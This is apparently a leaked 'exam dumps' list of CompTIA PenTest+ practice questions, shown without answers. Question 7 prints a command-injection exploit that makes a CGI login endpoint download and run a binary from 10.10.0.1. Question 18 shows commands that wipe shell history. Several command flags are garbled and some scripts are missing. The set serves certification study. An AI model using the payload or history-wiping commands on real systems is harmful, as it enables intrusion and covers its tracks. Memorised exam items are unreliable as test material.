CompTIA PenTest+ PT0-002 Exam Dumps

1. A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function.

Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

2. A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache.

Which of the following commands will accomplish this task?

3. A penetration tester runs the following command on a system:

find / -user root Cperm -4000 Cprint 2>/dev/null

Which of the following is the tester trying to accomplish?

4. A penetration tester logs in as a user in the cloud environment of a company.

Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

5. A penetration tester ran an Nmap scan on an Internet-facing network device with the CF option and found a few open ports.

To further enumerate, the tester ran another scan using the following command:

nmap CO CA CsS Cp- 100.100.100.50

Nmap returned that all 65,535 ports were filtered.

Which of the following MOST likely occurred on the second scan?

6. A penetration tester is working on a scoping document with a new client.

The methodology the client uses includes the following:

✑ Pre-engagement interaction (scoping and ROE)

✑ Intelligence gathering (reconnaissance)

✑ Threat modeling

✑ Vulnerability analysis

✑ Exploitation and post exploitation

✑ Reporting

Which of the following methodologies does the client use?

7. A penetration tester was able to gain access to a system using an exploit.

The following is a snippet of the code that was utilized:

exploit = “POST ”

exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C

c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”

exploit += “HTTP/1.1”

Which of the following commands should the penetration tester run post-engagement?

8. Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

9. A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011.

Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

10. A penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-12-20 09:23AM 331 index.aspx

| ftp-syst:

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2012 Std 3389/tcp open ssl/ms-wbt-server | rdp-ntlm-info:

| Target Name: WEB3

| NetBIOS_Computer_Name: WEB3

| Product_Version: 6.3.9600

|_ System_Time: 2021-01-15T11:32:06+00:00 8443/tcp open http Microsoft IIS httpd 8.5 | http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

11. A company becomes concerned when the security alarms are triggered during a penetration test.

Which of the following should the company do NEXT?

12. A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging.

Which of the following techniques would BEST accomplish this goal?

13. A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday.

Which of the following should the security company have acquired BEFORE the start of the assessment?

14. Given the following output:

User-agent:*

Disallow: /author/

Disallow: /xmlrpc.php

Disallow: /wp-admin

Disallow: /page/

During which of the following activities was this output MOST likely obtained?

15. User credentials were captured from a database during an assessment and cracked using rainbow tables.

Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

16. A penetration tester writes the following script:





Which of the following objectives is the tester attempting to achieve?

17. A penetration tester has been given eight business hours to gain access to a client’s financial system.

Which of the following techniques will have the highest likelihood of success?

18. A penetration tester gains access to a system and establishes persistence, and then runs the following commands:

cat /dev/null > temp

touch Cr .bash_history temp

mv temp .bash_history

Which of the following actions is the tester MOST likely performing?

19. A penetration tester ran a ping CA command during an unknown environment test, and it returned a 128 TTL packet.

Which of the following OSs would MOST likely return a packet of this type?

20. A penetration tester wrote the following script to be used in one engagement:





Which of the following actions will this script perform?

21. A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building.

Which of the following techniques would be BEST to use to gain confidential information?

22. A penetration tester obtained the following results after scanning a web server using the dirb utility:

...

GENERATED WORDS: 4612

---- Scanning URL: http://10.2.10.13/ ----

+ http://10.2.10.13/about (CODE:200|SIZE:1520)

+ http://10.2.10.13/home.html (CODE:200|SIZE:214)

+ http://10.2.10.13/index.html (CODE:200|SIZE:214)

+ http://10.2.10.13/info (CODE:200|SIZE:214)

...

DOWNLOADED: 4612 C FOUND: 4

Which of the following elements is MOST likely to contain useful information for the penetration tester?

23. Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

24. A client has requested that the penetration test scan include the following UDP services:

SNMP, NetBIOS, and DNS.

Which of the following Nmap commands will perform the scan?

25. Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

26. A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company’s web presence.

Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)

27. A company recruited a penetration tester to configure wireless IDS over the network.

Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

28. A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift.

Which of the following social-engineering attacks was the tester utilizing?

29. A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service.

Which of the following methods would BEST support validation of the possible findings?

30. A penetration tester conducted a discovery scan that generated the following:





Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

31. Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

32. A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources.

Which of the following attack types is MOST concerning to the company?

33. Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

34. A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped.

Which of the following would be the BEST recommendation to prevent this type of activity in the future?

35. A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals.

Which of the following should the tester do NEXT?

36. Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

37. A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active.

Which of the following commands should be used to accomplish the goal?

38. A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.

Which of the following actions should the tester take?

39. A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop.

Which of the following can be used to ensure the tester is able to maintain access to the system?

40. A penetration tester performs the following command:

curl CI Chttp2 https://www.comptia.org

Which of the following snippets of output will the tester MOST likely receive?

41. In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers.

Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

42. A penetration tester is scanning a corporate lab network for potentially vulnerable services.

Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

43. A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.

Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

44. A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract.

Which of the following concerns would BEST support the software company’s request?